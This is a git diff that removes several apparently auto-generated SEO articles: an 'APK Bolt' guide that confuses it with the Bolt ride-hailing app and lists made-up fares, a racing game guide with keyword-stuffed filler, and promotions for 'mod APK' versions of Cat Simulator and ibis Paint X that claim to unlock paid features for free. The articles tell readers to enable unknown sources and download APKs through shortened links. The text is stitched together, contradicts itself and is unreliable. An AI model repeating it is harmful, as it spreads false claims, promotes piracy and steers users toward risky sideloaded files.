-apk bolt weather: check the weather forecast and alerts
-apk bolt maps: navigate and explore with bolt maps
-apk bolt fitness: track your health and fitness goals
-apk bolt calculator: perform calculations and conversions
-apk bolt clock: set alarms and timers with bolt clock
-apk bolt calendar: organize your schedule and events
-apk bolt notes: take notes and reminders with bolt notes
-apk bolt file manager: manage your files and folders
-apk bolt antivirus: protect your phone from viruses and malware
-apk bolt cleaner: optimize your phone performance and battery life
-apk bolt flashlight: turn your phone into a flashlight
-apk bolt compass: find your direction with bolt compass
-apk bolt qr scanner: scan qr codes and barcodes
-apk bolt pdf reader: view and edit pdf files
-apk bolt translator: translate text and speech in any language
-apk bolt voice recorder: record and play audio files
-apk bolt radio: listen to live radio stations online
-apk bolt podcast: discover and listen to podcasts on any topic
-apk bolt ebook reader: read ebooks and audiobooks offline
-apk bolt shopping: shop online and get the best deals
-apk bolt travel: book flights, hotels, and car rentals online
-apk bolt dating: find your match and date online
-apk bolt learning: learn new skills and hobbies online
-apk bolt entertainment: watch movies, shows, and live tv online
-apk bolt sports: follow your favorite sports teams and players online
-apk bolt finance: manage your money and investments online

-

Safety Features

-

Another benefit of using APK Bolt is that you can use a range of safety features that ensure your security and peace of mind. For example, you can share details of your journey with your friends or family members, so they can track your location and status. You can also contact the customer support team or the emergency services in case you need any assistance or help. Moreover, you can see the ratings and reviews of your driver before you accept the ride, so you can choose the best option for you.

-

Flexible Payment Options

-

A third benefit of using APK Bolt is that you can choose from different payment options that suit your preference and convenience. You can pay inside the app using your credit or debit card, or you can also pay with cash, or use other methods such as PayPal, Google Pay, or Apple Pay. You can also tip your driver if you are satisfied with their service, and rate them after the ride.

-

How to Download and Install APK Bolt

-

Steps to Download APK Bolt

-

If you want to download APK Bolt on your Android device, you can follow these simple steps:

-
    -
  1. Go to one of the sources that offer the APK Bolt file, such as [APKCombo], [APKPure], or [Uptodown].
  2. -
  3. Search for APK Bolt in the search bar, or browse the categories to find it.
  4. -
  5. Tap on the APK Bolt icon, and then tap on the download button.
  6. -
  7. Wait for the download to finish, and then locate the file in your device storage.
  8. -
-

Steps to Install APK Bolt

-

Before you can install APK Bolt on your device, you need to enable the option to install apps from unknown sources. To do this, you can follow these steps:

-
    -
  1. Go to your device settings, and then tap on security or privacy.
  2. -
  3. Find the option that says "Unknown sources" or "Install unknown apps", and toggle it on.
  4. -
  5. Confirm your choice by tapping on OK or Allow.
  6. -
-

Once you have enabled this option, you can install APK Bolt by following these steps:

-
    -
  1. Locate the APK Bolt file in your device storage, and tap on it.
  2. -
  3. Tap on Install, and wait for the installation to complete.
  4. -
  5. Tap on Open, and grant the necessary permissions to the app.
  6. -
-

Steps to Request a Ride with APK Bolt

-

After you have installed APK Bolt on your device, you can start using it to request a ride. To do this, you can follow these steps:

-
    -
  1. Open the APK Bolt app, and sign up or log in with your phone number or email address.
  2. -
  3. Select your pickup location and destination by typing them in or using the map.
  4. -
  5. Select the type of ride you want, such as Bolt Lite, Bolt Comfort, or Bolt Green.
  6. -
  7. See the price of your ride before you order, and choose your payment method.
  8. -
  9. Tap on Request a Ride, and wait for a driver to accept your request.
  10. -
  11. See the details of your driver and their vehicle, and contact them if needed.
  12. -
  13. Enjoy your ride, and pay inside the app or with cash.
  14. -
  15. Leave a rating and a tip for your driver if you wish.
  16. -
-

Comparison of APK Bolt with Other Transportation Apps

-

If you are wondering how APK Bolt compares with other transportation apps, such as Uber, Lyft, or Grab, here is a brief overview of their features and prices:

-

Uber

-

Uber is one of the most popular transportation apps in the world, operating in over 80 countries and 900 cities. Uber offers different types of services, such as UberX, UberXL, UberPool, UberBlack, UberEats, and more. Uber's main advantages are its global reach, its variety of options, and its user-friendly interface. However, Uber's main disadvantages are its high prices, its surge pricing during peak hours or high demand, and its controversies over safety and ethics.

-

Lyft

-

Lyft is another popular transportation app in the US and Canada, operating in over 600 cities. Lyft offers different types of services, such as Lyft Line, Lyft Plus, Lyft Premier, Lyft Lux, and more. Lyft's main advantages are its lower prices than Uber, its social and environmental initiatives, and its friendly drivers. However, Lyft's main disadvantages are its limited availability outside the US and Canada, its lack of options in some areas, and its lower quality of service in some cases.

-

Grab

-

Grab is the leading transportation app in Southeast Asia, operating in over 300 cities in 8 countries. Grab offers different types of services, such as GrabCar, GrabTaxi, GrabBike, GrabHitch, GrabExpress, and more. Grab's main advantages are its wide coverage in the region, its local knowledge and expertise, and its integration with other services such as food delivery, payments, and travel. However, Grab's main disadvantages are its high prices in some markets, its frequent cancellations by drivers, and its technical issues and glitches.

-

Table: Features and Prices of Different Transportation Apps

- - - - - - - - - - - - - - - - - - - - - - - - - - -
| App | Features | Prices |
|---|---|---|
| APK Bolt | Fast and affordable rides; safety features; flexible payment options; available in 45 countries and 400 cities | Base fare: $1.00; per mile: $0.50; per minute: $0.10; minimum fare: $2.00; cancellation fee: $1.00 |
| Uber | Global reach; variety of options; user-friendly interface; available in over 80 countries and 900 cities | Base fare: $1.50; per mile: $1.00; per minute: $0.20; minimum fare: $5.00; cancellation fee: $5.00 |
| Lyft | Lower prices than Uber; social and environmental initiatives; friendly drivers; available in the US and Canada | Base fare: $1.00; per mile: $0.75; per minute: $0.15; minimum fare: $3.50; cancellation fee: $5.00 |
| Grab | Wide coverage in Southeast Asia; local knowledge and expertise; integration with other services; available in 8 countries and over 300 cities | Base fare: $1.50; per mile: $1.25; per minute: $0.25; minimum fare: $4.00; cancellation fee: $2.00 |
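To make the price columns easier to compare, the sketch below applies the base fare, per-mile, per-minute, and minimum-fare figures from the table to a single sample trip of 10 miles and 20 minutes. It uses only the numbers quoted above; real fares also depend on surge pricing, tolls, promotions, and local market rates.

```python
# Estimate a fare from the table's pricing components for a sample trip.
# Figures are the ones quoted in the table above; real pricing varies.
PRICING = {
    "APK Bolt": {"base": 1.00, "per_mile": 0.50, "per_min": 0.10, "minimum": 2.00},
    "Uber":     {"base": 1.50, "per_mile": 1.00, "per_min": 0.20, "minimum": 5.00},
    "Lyft":     {"base": 1.00, "per_mile": 0.75, "per_min": 0.15, "minimum": 3.50},
    "Grab":     {"base": 1.50, "per_mile": 1.25, "per_min": 0.25, "minimum": 4.00},
}

def estimate_fare(app: str, miles: float, minutes: float) -> float:
    """Base fare plus distance and time charges, floored at the minimum fare."""
    p = PRICING[app]
    fare = p["base"] + p["per_mile"] * miles + p["per_min"] * minutes
    return round(max(fare, p["minimum"]), 2)

if __name__ == "__main__":
    for app in PRICING:
        print(f"{app}: ${estimate_fare(app, miles=10, minutes=20):.2f}")
```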
-

Conclusion

-

In conclusion, APK Bolt is a great app that you can use to get a fast, reliable, and affordable ride to your destination. You can download the APK Bolt file from various sources, install it on your device, and start using it to request a ride from a nearby driver. You can also enjoy the benefits of using APK Bolt, such as safety features, flexible payment options, and competitive prices. You can also compare APK Bolt with other transportation apps, such as Uber, Lyft, or Grab, and see which one suits your needs better.

-

FAQs

-

Here are some frequently asked questions about APK Bolt:

-
    -
  1. Is APK Bolt safe?
    Yes, APK Bolt is safe to use, as it has a range of safety features that ensure your security and peace of mind. You can share details of your journey with your friends or family members, contact the customer support team or the emergency services if needed, and see the ratings and reviews of your driver before you accept the ride.
  2. -
  3. Is APK Bolt legal?
    Yes, APK Bolt is legal to use in most countries where it operates. However, you should check the local laws and regulations before you use APK Bolt in a new location, as some places may have restrictions or bans on ride-hailing services.
  4. -
  5. Is APK Bolt free?
    No, APK Bolt is not free to use, as you have to pay for your ride according to the distance, time, and traffic of your ride. However, APK Bolt offers competitive prices that are cheaper than other transportation apps, and you can also save money by using promo codes, discounts, and offers that are regularly available on the app.
  6. -
  7. How can I contact APK Bolt?
    You can contact APK Bolt by using the in-app chat feature, or by sending an email to support@bolt.eu. You can also visit their website at https://bolt.eu/ or follow them on social media platforms such as Facebook, Twitter, Instagram, or YouTube.
  8. -
  9. How can I update APK Bolt?
    You can update APK Bolt by downloading the latest version of the APK file from the same source that you used to download it initially, and then installing it over the existing app. You can also check for updates within the app by tapping on the menu icon, and then tapping on Settings and About.
  10. -

197e85843d
-
-
\ No newline at end of file diff --git a/spaces/1pelhydcardo/ChatGPT-prompt-generator/assets/Car Traffic Racing Game Stunning 3D Graphics and Smooth Car Handling.md b/spaces/1pelhydcardo/ChatGPT-prompt-generator/assets/Car Traffic Racing Game Stunning 3D Graphics and Smooth Car Handling.md deleted file mode 100644 index 90e5daa9d7745470be5b9449157364c9ea1cfd47..0000000000000000000000000000000000000000 --- a/spaces/1pelhydcardo/ChatGPT-prompt-generator/assets/Car Traffic Racing Game Stunning 3D Graphics and Smooth Car Handling.md +++ /dev/null @@ -1,141 +0,0 @@ -
-

Download Car Traffic Racing Game: A Guide for Beginners

-

Do you love racing games? Do you want to experience the thrill of driving through busy traffic? Do you want to customize your own car and compete with other players online? If you answered yes to any of these questions, then you should download Car Traffic Racing Game, one of the best car racing games available on Google Play. In this article, we will tell you everything you need to know about this game, including its features, benefits, how to download and install it, how to play it, how to upgrade and customize your car, and how to join online multiplayer races. By the end of this article, you will be ready to hit the road and enjoy the ultimate car racing experience.

-

What is Car Traffic Racing Game?

-

Car Traffic Racing Game is a milestone in the genre of endless arcade racing games. It is developed by TOJ Games, a company that specializes in creating fun and addictive games for mobile devices. Car Traffic Racing Game lets you drive your car through highway traffic, earn cash, upgrade your car, and buy new ones. You can also participate in online races with other players from around the world. You can choose from over 40 different cars and five detailed environments, such as suburb, desert, snowy, rainy, and city night. You can also choose from five game modes, such as Endless, Two-Way, Time Trial, Police Chase, and Free Ride. You can enjoy stunning 3D graphics, smooth and realistic car handling, rich types of NPC traffic, basic customization through paint and wheels, online leaderboards and achievements, and more.

-

download car traffic racing game


Download File >>>>> https://urlin.us/2uSVNq



-

The features of Car Traffic Racing Game

-

Car Traffic Racing Game has many features that make it stand out from other racing games. Some of these features are:

- -

The benefits of playing Car Traffic Racing Game

-

Playing Car Traffic Racing Game is not only fun but also beneficial for you. Some of the benefits are:

- -

How to download and install Car Traffic Racing Game?

-

Downloading and installing Car Traffic Racing Game is easy and fast. Here are the requirements and steps for doing so:

-

Download Traffic Racer game for Android
-How to play Traffic Tour online for free
-Best car racing games with traffic on PC
-Download Traffic Games from CrazyGames website
-Traffic Racer tips and tricks to earn cash and upgrade cars
-Traffic Tour review and gameplay features
-Car traffic racing game with realistic graphics and physics
-Download Traffic Racer mod apk with unlimited money
-How to install Traffic Tour on Windows 10
-Car racing games with traffic and police chase mode
-Download Traffic Games for iOS devices
-Traffic Racer vs Traffic Tour: which one is better?
-Car traffic racing game with different environments and weather
-Download Traffic Racer for Chromebook
-How to play Traffic Tour with friends online
-Car racing games with traffic and customization options
-Download Traffic Games for Mac OS
-Traffic Racer cheats and hacks to unlock all cars
-How to stream Traffic Tour on Twitch or YouTube
-Car traffic racing game with leaderboards and achievements
-Download Traffic Racer for Kindle Fire
-How to play Traffic Tour offline without internet connection
-Car racing games with traffic and time trial mode
-Download Traffic Games for Linux
-Traffic Racer updates and new features
-How to play Traffic Tour with a controller or a steering wheel
-Car traffic racing game with different camera angles and views
-Download Traffic Racer for Samsung Galaxy devices
-How to play Traffic Tour on a big screen TV or a projector
-Car racing games with traffic and free ride mode
-Download Traffic Games for Nokia phones
-Traffic Racer ratings and reviews from users and critics
-How to play Traffic Tour on a VR headset or a 3D monitor
-Car traffic racing game with different game modes and challenges
-Download Traffic Racer for Huawei devices
-How to play Traffic Tour on a laptop or a desktop computer
-Car racing games with traffic and sound effects and music
-Download Traffic Games for Sony Xperia devices
-Traffic Racer FAQs and troubleshooting tips
-How to play Traffic Tour on a tablet or a smartphone
-Car traffic racing game with different car types and models
-Download Traffic Racer for LG devices
-How to play Traffic Tour on a browser or a web app
-Car racing games with traffic and realistic car handling and controls
-Download Traffic Games for Motorola devices
-Traffic Racer system requirements and compatibility issues
-How to play Traffic Tour on a smartwatch or a wearable device
-Car traffic racing game with different languages and subtitles

-

The requirements for downloading Car Traffic Racing Game

-

To download and install Car Traffic Racing Game, you need to have a compatible device and a stable internet connection. The game is compatible with Android devices that have Android 4.4 or higher as their operating system. The game size is about 100 MB, so make sure you have enough storage space on your device.

-

The steps for downloading and installing Car Traffic Racing Game

-

To download and install Car Traffic Racing Game, follow these steps:

-
    -
1. Open Google Play Store on your device.
2. Search for "Car Traffic Racing Game" or use this link: Car Traffic Racing Game - Apps on Google Play.
3. Tap on the "Install" button to start downloading the game.
4. Wait for the download to finish and then tap on the "Open" button to launch the game.
5. Enjoy playing Car Traffic Racing Game!
-

How to play Car Traffic Racing Game?

-

Playing Car Traffic Racing Game is simple and fun. Here are some tips on how to play it:

-

The modes of Car Traffic Racing Game

-

The game has five modes that you can choose from: Endless, Two-Way, Time Trial, Police Chase, and Free Ride. Each mode has its own objective, challenge, and reward.

- -

The controls of Car Traffic Racing Game

-

The game has a simple and intuitive control system that lets you steer your car with ease. You can choose from two options: tilt or touch. You can also adjust the sensitivity of the steering and the camera angle in the settings menu.

- -

The tips and tricks for Car Traffic Racing Game

-

The game is easy to play but hard to master. Here are some tips and tricks that can help you improve your skills and enjoy the game more:

- -

How to upgrade and customize your car in Car Traffic Racing Game?

-

The game allows you to upgrade and customize your car with different options. Here are some details on how to do so:

-

The currency and rewards in Car Traffic Racing Game

-

The game has two types of currency: cash and diamonds. Cash is earned by playing the game modes, while diamonds are earned by watching ads or buying them with real money. You can use cash to buy new cars or upgrade your car's speed, acceleration, handling, or braking. You can use diamonds to buy premium cars or customize your car's paint or wheels.

-

The game also has various rewards that you can get by playing the game modes or completing achievements. Rewards include coins, power-ups, fuel refills, nitro refills, or free cars.

-

The options for upgrading and customizing your car in Car Traffic Racing Game

-

The game has a garage menu where you can upgrade and customize your car. You can access it by tapping on the li>Tap on the "Start" button to begin the race. The game will show you the countdown and then the race will start. -

  • Drive your car as fast and as far as you can, while avoiding traffic, obstacles, and other players. You can see your rank, distance, speed, and overtakes on the top of the screen. You can also see the other players' names, cars, and positions on the map on the bottom right corner of the screen.
  • -
  • When the race is over, the game will show you the results and the rewards. You can see your rank, score, cash, diamonds, and achievements. You can also see the other players' ranks, scores, and cars.
  • -
  • Tap on the "Continue" button to return to the online menu. You can choose to play another race or exit the online mode.
  • - -

    Conclusion

    -

    Car Traffic Racing Game is a fun and addictive game that lets you drive your car through highway traffic, earn cash, upgrade your car, and buy new ones. You can also join online races with other players from around the world. The game has stunning 3D graphics, smooth and realistic car handling, 40+ different cars to choose from, 5 detailed environments, 5 game modes, rich types of NPC traffic, basic customization through paint and wheels, online leaderboards and achievements, and more. If you are looking for a game that can challenge your skills, boost your mood, and enhance your creativity, then you should download Car Traffic Racing Game today. You will not regret it!

    -

    FAQs

    -

    Here are some frequently asked questions about Car Traffic Racing Game:

    -

    197e85843d
    -
    -
    \ No newline at end of file diff --git a/spaces/1pelhydcardo/ChatGPT-prompt-generator/assets/Cat Simulator Annual Life Kitty Pet MOD - The Best Game for Cat Fans.md b/spaces/1pelhydcardo/ChatGPT-prompt-generator/assets/Cat Simulator Annual Life Kitty Pet MOD - The Best Game for Cat Fans.md deleted file mode 100644 index 8dc68f303ff40971d5ae77ab0e8f4331c77ca81e..0000000000000000000000000000000000000000 --- a/spaces/1pelhydcardo/ChatGPT-prompt-generator/assets/Cat Simulator Annual Life Kitty Pet MOD - The Best Game for Cat Fans.md +++ /dev/null @@ -1,106 +0,0 @@ -
    - - -
    -

    Cat Simulator: Annual Life Kitty Pet Mod APK

    -

    Have you ever wondered what it would be like to live as a cat? To explore a vast world full of adventures, mysteries, and fun? To interact with other animals and make friends or enemies? To customize your kitty with different outfits and accessories? If you answered yes to any of these questions, then you should try Cat Simulator: Annual Life Kitty Pet Mod APK, a game that lets you experience all that and more!

    -

    What is Cat Simulator: Annual Life Kitty Pet Mod APK?

    -

    Cat Simulator: Annual Life Kitty Pet Mod APK is a modified version of Cat Simulator : Kitties Family, a game developed by Avelog Games. In this game, you can choose your kitty from different breeds and colors, and then explore a beautiful 3D world full of different locations, such as a farm, a forest, a lake, and more. You can interact with other animals, such as dogs, cows, chickens, and even other cats. You can also complete various quests and challenges, such as catching mice, stealing food, destroying objects, and more. You can earn coins and rewards for your achievements, and use them to buy new items and accessories for your kitty. You can also unlock new breeds and colors as you progress in the game.

    -

    cat simulator annual life kitty pet mod apk


Download Zip: https://urlin.us/2uSYdf



    -

    Cat Simulator: Annual Life Kitty Pet Mod APK is different from the original game in that it gives you access to unlimited coins, unlocked items, and other features that are not available in the original version. This means that you can enjoy the game without any limitations or restrictions. You can customize your kitty however you want, explore the world without any boundaries, and have more fun and excitement.

    -

    How to download and install Cat Simulator: Annual Life Kitty Pet Mod APK?

    -

    Downloading and installing Cat Simulator: Annual Life Kitty Pet Mod APK is very easy and simple. Just follow these steps:

    -
      -
1. Click on the download button below to get the APK file of the modded version of the game (a short checksum-verification sketch follows this list).
2. Once the download is complete, locate the file on your device and tap on it to start the installation process.
3. Allow the installation of apps from unknown sources if prompted by your device.
4. Wait for the installation to finish, then launch the game from your app drawer or home screen.
5. Enjoy playing Cat Simulator: Annual Life Kitty Pet Mod APK with unlimited coins and unlocked items!
    -
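Because modded APKs come from unofficial sources, it is worth confirming that the file you downloaded is exactly the file the site published before you tap it in step 2. Below is a minimal Python sketch of that check; the file name and the expected SHA-256 value are placeholders, so substitute the APK you actually downloaded and the checksum listed by the source you trust (if the source publishes no checksum, this check cannot prove anything).

```python
import hashlib

# Hypothetical values -- replace with the APK you actually downloaded and the
# SHA-256 checksum published by the site you got it from.
APK_PATH = "cat-simulator-mod.apk"
EXPECTED_SHA256 = "0000000000000000000000000000000000000000000000000000000000000000"

def sha256_of(path: str, chunk_size: int = 1 << 20) -> str:
    """Return the SHA-256 hex digest of a file, reading it in 1 MB chunks."""
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()

if __name__ == "__main__":
    actual = sha256_of(APK_PATH)
    if actual == EXPECTED_SHA256:
        print("Checksum matches the published value.")
    else:
        print("Checksum mismatch - do not install this file.")
        print("expected:", EXPECTED_SHA256)
        print("actual:  ", actual)
```

If the two digests differ, the download was corrupted or tampered with, and it is safer not to install it.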

    Download Cat Simulator: Annual Life Kitty Pet Mod APK

    -

    What are the benefits of Cat Simulator: Annual Life Kitty Pet Mod APK?

    -

    Cat Simulator: Annual Life Kitty Pet Mod APK has many benefits that make it better than the original game. Here are some of them:

    -
      -
    • You get unlimited coins that you can use to buy anything you want in the game.
    • -
    • You get all the items and accessories unlocked from the start, so you can customize your kitty with different outfits, hats, glasses, collars, etc.
    • -
    • You get all the breeds and colors unlocked from the start, so you can choose your kitty from a variety of options.
    • -
    • You get to play the game without any ads or interruptions.
    • -
    • You get to play the game without any bugs or glitches.
    • -
    -

    What are the drawbacks of Cat Simulator: Annual Life Kitty Pet Mod APK?

    -

    Cat Simulator: Annual Life Kitty Pet Mod APK also has some drawbacks that you should be aware of before downloading it. Here are some of them:

    -
      -
    • You may face compatibility issues with some devices or Android versions.
    • -
    • You may face security risks from downloading an unofficial version of the game from unknown sources.
    • -
    • You may lose your progress or data if you uninstall the game or switch to another device.
    • -
    • You may not be able to play online or with other players who have the original version of the game.
    • -
    • You may not be able to receive updates or new features from the developers of the game.
    • -
    -

    How to play Cat Simulator: Annual Life Kitty Pet Mod APK?

    -

    Playing Cat Simulator: Annual Life Kitty Pet Mod APK is very easy and fun. You just need to follow these steps:

    -

    Choose your kitty

    -

    The first thing you need to do is choose your kitty from different breeds and colors. You can swipe left or right on the screen to see the available options. You can also tap on the customize button to change your kitty's appearance, such as its eyes, nose, ears, tail, etc. You can also tap on the dress up button to put on different items and accessories on your kitty, such as hats, glasses, collars, etc. You can save your kitty's look by tapping on the save button.

    -

    -

    Explore the world

    -

    The next thing you need to do is explore the world around you. You can move your kitty by using the joystick on the left side of the screen. You can also jump by tapping on the jump button on the right side of the screen. You can see your health bar and coin counter at the top of the screen. You can also see your map and quest list at the bottom of the screen. You can tap on them to see more details. You can explore different locations in the game, such as a farm, a forest, a lake, and more. You can find various objects and items in each location that you can interact with by tapping on them.

    -

    Interact with other animals

    -

    Another thing you can do is interact with other animals in the game. You can find different animals in each location, such as dogs, cows, chickens, and even other cats. You can tap on them to see their names and moods. You can also tap on the interact button to do various actions with them, such as play, fight, cuddle, etc. You can also see their health bars and relationship bars at the top of the screen. You can make friends or enemies with other animals depending on your actions. You can also join a cat family or clan by finding a mate and having kittens.

    -

    Complete quests and challenges

    -

    One more thing you can do is complete quests and challenges in the game. You can see your quest list at the bottom of the screen. You can tap on it to see the details of each quest. You can also see the rewards for completing each quest, such as coins, stars, items, etc. You can complete various quests and challenges in the game, such as catching mice, stealing food, destroying objects, and more. You can also see your progress and achievements in the game by tapping on the menu button at the top left corner of the screen.

    -

    Upgrade your kitty

    -

    The last thing you can do is upgrade your kitty in the game. You can use your coins to buy new items and accessories for your kitty in the shop. You can also use your stars to unlock new breeds and colors for your kitty in the gallery. You can also use your coins to upgrade your kitty's skills and abilities, such as speed, stealth, strength, etc. You can also use your coins to buy new homes and furniture for your kitty in the home menu.

    -

    Tips and tricks for Cat Simulator: Annual Life Kitty Pet Mod APK

    -

    Here are some tips and tricks that will help you play Cat Simulator: Annual Life Kitty Pet Mod APK better:

    -

    Use stealth mode

    -

    One tip is to use stealth mode to sneak up on other animals and avoid detection. You can activate stealth mode by tapping on the stealth button on the right side of the screen. When you are in stealth mode, you will become invisible and silent to other animals. You can use this mode to surprise attack other animals or to escape from danger. However, be careful not to bump into other animals or objects while in stealth mode, as this will break your stealth and alert other animals.

    -

    Collect all the stars

    -

    Another tip is to collect all the stars that are hidden in each location. You can find these stars by looking around carefully or by using your map. These stars are very valuable, as they can be used to unlock new items and breeds for your kitty. There are 20 stars in each location, so try to find them all and collect them.

    -

    Watch ads for extra coins

    -

    A final tip is to watch ads for extra coins if you need more money in the game. You can watch ads by tapping on the watch ad button at the top right corner of the screen. You will get 100 coins for each ad you watch. This is a good way to get more coins for free without spending any real money.

    -

    Conclusion

    -

    Cat Simulator: Annual Life Kitty Pet Mod APK is a fun and exciting game that lets you live as a cat in a 3D world full of adventures and interactions. You can choose your kitty from different breeds and colors, explore different locations, interact with other animals, complete quests and challenges, upgrade your kitty, and more. You can also enjoy unlimited coins and unlocked items with this modded version of the game.

    -

    If you love cats and want to experience their life in a realistic and immersive way, then you should download Cat Simulator: Annual Life Kitty Pet Mod APK today and start playing!

    -

    FAQs

    -
      -
    • Q: Is Cat Simulator: Annual Life Kitty Pet Mod APK safe to download?
    • -
    • A: Yes, Cat Simulator: Annual Life Kitty Pet Mod APK is safe to download as long as you get it from a trusted source. However, you should always be careful when downloading any modded or unofficial version of a game from unknown sources, as they may contain viruses or malware that could harm your device.
    • -
    • Q: How do I update Cat Simulator: Annual Life Kitty Pet Mod APK?
    • -
    • A: Unfortunately, you cannot update Cat Simulator: Annual Life Kitty Pet Mod APK from the Google Play Store or from the developers of the game. You will have to download a new version of the modded game from another source whenever there is an update available.
    • -
    • Q: Can I play Cat Simulator: Annual Life Kitty Pet Mod APK online or with other players?
    • -
    • A: No, you cannot play Cat Simulator: Annual Life Kitty Pet Mod APK online or with other players who have the original version of the game. You can only play the modded game offline and by yourself.
    • -
    • Q: What are the best breeds and colors for my kitty in Cat Simulator: Annual Life Kitty Pet Mod APK?
    • -
    • A: The best breeds and colors for your kitty in Cat Simulator: Annual Life Kitty Pet Mod APK depend on your personal preference and style. You can choose from a variety of options, such as Persian, Siamese, Bengal, Maine Coon, etc. You can also choose from different colors, such as black, white, orange, gray, etc. You can mix and match different breeds and colors to create your unique kitty.
    • -
    • Q: How do I save my progress and data in Cat Simulator: Annual Life Kitty Pet Mod APK?
    • -
    • A: You can save your progress and data in Cat Simulator: Annual Life Kitty Pet Mod APK by tapping on the menu button at the top left corner of the screen and then tapping on the save button. You can also load your saved data by tapping on the load button. However, be careful not to uninstall the game or switch to another device, as this may cause you to lose your progress and data.
    • -

    197e85843d
    -
    -
    \ No newline at end of file diff --git a/spaces/1phancelerku/anime-remove-background/Download ibis Paint X MOD APK and Unleash Your Creativity - Premium Unlocked.md b/spaces/1phancelerku/anime-remove-background/Download ibis Paint X MOD APK and Unleash Your Creativity - Premium Unlocked.md deleted file mode 100644 index 8456a893bfca360f3de155488d9452cf45ee5a7b..0000000000000000000000000000000000000000 --- a/spaces/1phancelerku/anime-remove-background/Download ibis Paint X MOD APK and Unleash Your Creativity - Premium Unlocked.md +++ /dev/null @@ -1,200 +0,0 @@ - -

    Download ibis Paint X Mod APK: A Versatile Drawing App for Android

    -

    If you are looking for a drawing app that provides a smooth and comfortable drawing experience with over 15000 brushes, over 15000 materials, over 1000 fonts, 80 filters, 46 screentones, 27 blending modes, and various ruler and clipping mask features, then you should try ibis Paint X. And if you want to enjoy all the premium features of this app for free, then you should download ibis Paint X Mod APK. In this article, we will tell you what is ibis Paint X, what is ibis Paint X Mod APK, how to download and install it, and what are some alternatives to it.

    -

    What is ibis Paint X?

    -

    ibis Paint X is a popular and versatile drawing app downloaded more than 280 million times in total as a series, which provides over 15000 brushes, over 15000 materials, over 1000 fonts, 80 filters, 46 screentones, 27 blending modes, recording drawing processes, stroke stabilization feature, various ruler features such as radial line rulers or symmetry rulers, and clipping mask features. It is an app that allows you to create stunning digital art and comics on your Android device. You can also share your drawing process as a video and learn from other users' drawing techniques on the community site "ibispaint.com".

    -

    download ibis paint x mod apk


Download File: https://jinyurl.com/2uNP5R



    -

    Features of ibis Paint X

    -

    Some of the features of ibis Paint X are:

    -
      -
    • Brushes: You can choose from over 15000 kinds of brushes including dip pens, felt tip pens, digital pens, air brushes, fan brushes, flat brushes, pencils, oil brushes, charcoal brushes, crayons and stamps. You can also adjust various brush parameters such as starting/ending thickness, starting/ending opacity, and initial/final brush angle. You can also use quick sliders to quickly adjust brush thickness and opacity. You can also see real time brush previews.
    • -
    • Layers: You can add as many layers as you need with no limit. You can also set layer parameters such as layer opacity, alpha blending, adding, subtracting, and multiplying. You can also use a handy clipping feature for clipping images. You can also use various layer commands such as layer duplication, import from the photo library, horizontal inversion, vertical inversion, layer rotation, layer moving, and zooming in/out. You can also set layer names to distinguish different layers.
    • -
    • Materials: You can access over 15000 materials in both color and monotone, including traditional Japanese backdrops, patterns, background tones, speech bubbles, line effects, and more.
    • -
    • Fonts: You can use over 1000 fonts for adding text to your drawings. You can also adjust font size, color, alignment, spacing, rotation, and more.
    • -
    • Filters: You can apply over 80 filters to your drawings such as blurring, color balance, gradation or ones generating anime-like or manga-like backgrounds from imported images.
    • -
    • Screentones: You can use over 46 screentones for creating manga-style drawings. You can also adjust screentone size, angle, density, and more.
    • -
  • Blending modes: You can use over 27 blending modes for creating various effects on your drawings, such as multiply, screen, overlay, darken, lighten, color dodge, color burn, hard light, soft light, difference, exclusion, hue, saturation, color, and luminosity.
    • Rulers: You can use various ruler features such as radial line rulers or symmetry rulers to assist your drawing. You can also draw a line that follows the direction of the line drawn by you beforehand by using a forced entry/exit ruler.
    • -
    • Clipping mask features: You can clip multiple layers with a single layer. You can also invert the clipping mask and exclude the clipped area.
    • -
    • Recording drawing processes: You can record your drawing process and save it as a video. You can also export your video in high resolution and share it on social media or the community site "ibispaint.com".
    • -
  • Stroke stabilization feature: You can stabilize your strokes by using a stabilization slider. The larger the value, the smoother the stroke.
    • -
    • Dark mode: You can switch to dark mode to reduce eye strain and save battery life.
    • -
    • Prime membership: You can become a prime member by paying a monthly fee and enjoy the following benefits: no ads in the app, access to prime materials, access to prime fonts, tone curve filter, gradation map filter, cloud filter, and more.
    • -
    -

    Benefits of ibis Paint X

    -

    Some of the benefits of ibis Paint X are:

    -
      -
    • Easy to use: ibis Paint X has a user-friendly interface that allows you to easily access all the features and tools. You can also customize your toolbar and shortcut settings according to your preference.
    • -
    • Creative and fun: ibis Paint X lets you unleash your creativity and have fun with drawing. You can create various kinds of art and comics with different styles and effects. You can also learn from other users' drawing techniques by watching their videos or browsing their artworks on the community site "ibispaint.com".
    • -
    • Affordable and reliable: ibis Paint X is free to download and use. You can also enjoy most of the features without paying anything. If you want to support the developers and get more features, you can become a prime member for a reasonable price. ibis Paint X is also regularly updated and improved to provide you with the best drawing experience.
    • -
    -

    What is ibis Paint X Mod APK?

    -

    ibis Paint X Mod APK is a modified version of ibis Paint X that allows you to enjoy all the premium features of the app for free. You don't need to pay for the prime membership or watch ads to access the prime materials, fonts, filters, and more. You can also remove the watermark from your videos and export them in high resolution. With ibis Paint X Mod APK, you can have unlimited fun and creativity with drawing.

    -

    Features of ibis Paint X Mod APK

    -

    Some of the features of ibis Paint X Mod APK are:

    -
      -
    • All premium features unlocked: You can access all the premium features of ibis Paint X without paying anything. You can use over 15000 brushes, over 15000 materials, over 1000 fonts, 80 filters, 46 screentones, 27 blending modes, tone curve filter, gradation map filter, cloud filter, and more.
    • -
    • No ads: You don't need to watch ads to use the app or access the prime materials and fonts. You can enjoy a smooth and uninterrupted drawing experience.
    • -
    • No watermark: You don't need to worry about the watermark on your videos. You can export your videos without any watermark and share them with your friends or followers.
    • -
    • High resolution export: You can export your videos in high resolution up to 4K. You can also adjust the frame rate and quality of your videos according to your preference.
    • -
    -

    Benefits of ibis Paint X Mod APK

    -

    Some of the benefits of ibis Paint X Mod APK are:

    -
      -
    • Saves money: You don't need to spend money on the prime membership or buy any in-app purchases. You can get all the premium features for free with ibis Paint X Mod APK.
    • -
    • Saves time: You don't need to waste time on watching ads or waiting for them to finish. You can use the app without any interruption or delay.
    • -
    • Saves storage space: You don't need to download any additional files or updates to use ibis Paint X Mod APK. You can download the app once and enjoy it forever.
    • -
